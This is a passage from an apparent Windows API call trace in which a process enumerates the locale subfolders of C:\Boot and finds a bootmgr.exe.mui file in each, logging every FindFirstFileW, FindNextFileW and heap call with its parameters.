ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.973] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.974] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.974] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.974] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.974] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.974] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0032.974] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.974] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.975] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.975] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.975] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.975] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.975] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0032.975] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.975] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.976] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.976] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.976] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.976] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.976] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0032.976] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.976] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.977] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.977] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.977] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.977] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.977] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0032.977] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.977] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.978] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.978] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.979] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.979] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.979] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0032.979] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.979] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.979] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.979] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.979] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.979] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.979] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0032.979] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.980] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.980] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.980] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.981] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.981] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.981] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0032.981] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.981] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.981] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.981] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.981] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.981] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.981] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0032.981] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.981] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.982] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.982] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.982] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.982] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.982] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0032.983] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.983] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.983] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.983] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.983] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.983] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.983] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0032.983] FindClose (in: hFindFile=0x6e39b0 | out: hFindFile=0x6e39b0) returned 1 [0032.983] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37e0fa0 | out: hHeap=0x5f0000) returned 1 [0032.983] FindNextFileW (in: hFindFile=0x6e2968, lpFindFileData=0x3a5fd00 | out: lpFindFileData=0x3a5fd00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, 